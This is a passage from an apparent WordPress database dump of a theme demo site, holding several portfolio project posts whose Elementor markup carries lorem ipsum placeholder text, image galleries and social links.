nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n\n<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"570\" height=\"506\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h2>After</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Results</h2>\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n<img width=\"570\" height=\"506\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-2.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h3>our gallery</h3>\n<h2>\n								 Photo gallery</h2>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-1.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-1.jpg\" alt=\"\">\n</a>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-2.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-2.jpg\" alt=\"\">\n</a>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-3.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-3.jpg\" alt=\"\">\n</a>','Buildings','','publish','open','closed','','buildings','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_projects&#038;p=639',0,'ova_projects','',0),(657,1,'2022-06-14 02:49:34','2022-06-14 02:49:34','<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style>\n<h2>Domestic</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h4>Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates</h4>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\nService:\n<h4> Interior design</h4>\nArchitect:\n<h4> Mike hardson</h4>\nDuration:\n<h4> 4.5 Months</h4>\nLocation:\n<h4> Broklyn, New York</h4>\n<ul>\n 	<li>\n                        <a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n</ul>\n<h2>Before</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Challenges</h2>\n 	<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n\n<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"570\" height=\"506\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h2>After</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Results</h2>\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n<img width=\"570\" height=\"506\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-2.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h3>our gallery</h3>\n<h2>\n								 Photo gallery</h2>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-1.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-1.jpg\" alt=\"\">\n</a>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-2.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-2.jpg\" alt=\"\">\n</a>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-3.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-3.jpg\" alt=\"\">\n</a>','Domestic','','publish','open','closed','','domestic','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_projects&#038;p=657',0,'ova_projects','',0),(662,1,'2022-06-14 02:52:01','2022-06-14 02:52:01','<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style>\n<h2>Philip Johnson</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h4>Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates</h4>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\nService:\n<h4> Interior design</h4>\nArchitect:\n<h4> Mike hardson</h4>\nDuration:\n<h4> 4.5 Months</h4>\nLocation:\n<h4> Broklyn, New York</h4>\n<ul>\n 	<li>\n                        <a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n</ul>\n<h2>Before</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Challenges</h2>\n 	<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n\n<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"570\" height=\"506\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h2>After</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Results</h2>\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n<img width=\"570\" height=\"506\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-2.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h3>our gallery</h3>\n<h2>\n								 Photo gallery</h2>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-1.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-1.jpg\" alt=\"\">\n</a>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-2.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-2.jpg\" alt=\"\">\n</a>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-3.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-3.jpg\" alt=\"\">\n</a>','Philip Johnson','','publish','open','closed','','philip-johnson','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_projects&#038;p=662',0,'ova_projects','',0),(665,1,'2022-06-14 02:54:08','2022-06-14 02:54:08','<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style>\n<h2>Richard Rogers</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h4>Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates</h4>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\nService:\n<h4> Interior design</h4>\nArchitect:\n<h4> Mike hardson</h4>\nDuration:\n<h4> 4.5 Months</h4>\nLocation:\n<h4> Broklyn, New York</h4>\n<ul>\n 	<li>\n                        <a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n</ul>\n<h2>Before</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Challenges</h2>\n 	<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n\n<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"570\" height=\"506\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h2>After</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Results</h2>\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n<img width=\"570\" height=\"506\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-2.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h3>our gallery</h3>\n<h2>\n								 Photo gallery</h2>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-1.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-1.jpg\" alt=\"\">\n</a>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-2.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-2.jpg\" alt=\"\">\n</a>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-3.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-3.jpg\" alt=\"\">\n</a>','Richard Rogers','','publish','open','closed','','richard-rogers','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_projects&#038;p=665',0,'ova_projects','',0),(677,1,'2022-06-14 03:00:29','2022-06-14 03:00:29','<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style>\n<h2>Cozy living room</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h4>Biophilia is the idea that humans possess an innate tendency to seek connections with nature. The term translates</h4>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\nService:\n<h4> Interior design</h4>\nArchitect:\n<h4> Mike hardson</h4>\nDuration:\n<h4> 4.5 Months</h4>\nLocation:\n<h4> Broklyn, New York</h4>\n<ul>\n 	<li>\n                        <a href=\"https://twitter.com/ovathemes\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.facebook.com/ovatheme.envato/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://ovatheme.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n 	<li>\n                        <a href=\"https://www.instagram.com/\" target=\"_blank\" rel=\"noopener\">\n</a></li>\n</ul>\n<h2>Before</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Challenges</h2>\n 	<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n\n<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"570\" height=\"506\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h2>After</h2>\nNeque porro est qui dolorem ipsum quia quaed inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Aelltes port lacus quis enim var sed efficitur turpis gilla sed sit amet finibus eros. Lorem Ipsum is simply dummy text of the printing and typesetting industry.\n<h2>Results</h2>\n<ul>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNemo enim ipsam voluptatem quia voluptas.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nNam libero tempore, cum soluta nobis est eligend.</li>\n 	<li>\n							<svg aria-hidden=\"true\"><use xlink:href=\"#fas-arrow-circle-right\"></use></svg>\nAccusamus et iusto odio dignissimos ducimus.</li>\n</ul>\nWhen an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.\n<img width=\"570\" height=\"506\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-2.jpg 570w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-2-300x266.jpg 300w\" sizes=\"(max-width: 570px) 100vw, 570px\">\n<h3>our gallery</h3>\n<h2>\n								 Photo gallery</h2>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-1.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-1.jpg\" alt=\"\">\n</a>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-2.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-2.jpg\" alt=\"\">\n</a>\n<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-3.jpg\" data-fancybox=\"project-photo\" data-caption=\"\">\n<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/gallery-3.jpg\" alt=\"\">\n</a>','Cozy living room','','publish','open','closed','','cozy-living-room','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_projects&#038;p=677',0,'ova_projects','',0),(684,1,'2022-06-14 03:02:50','2022-06-14 03:02:50','<style>/*! elementor - v3.6.6 - 08-06-2022 */<br />\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style>\n<h2>Greater commercial</h2>\nNeque porro est qui dolorem ipsum 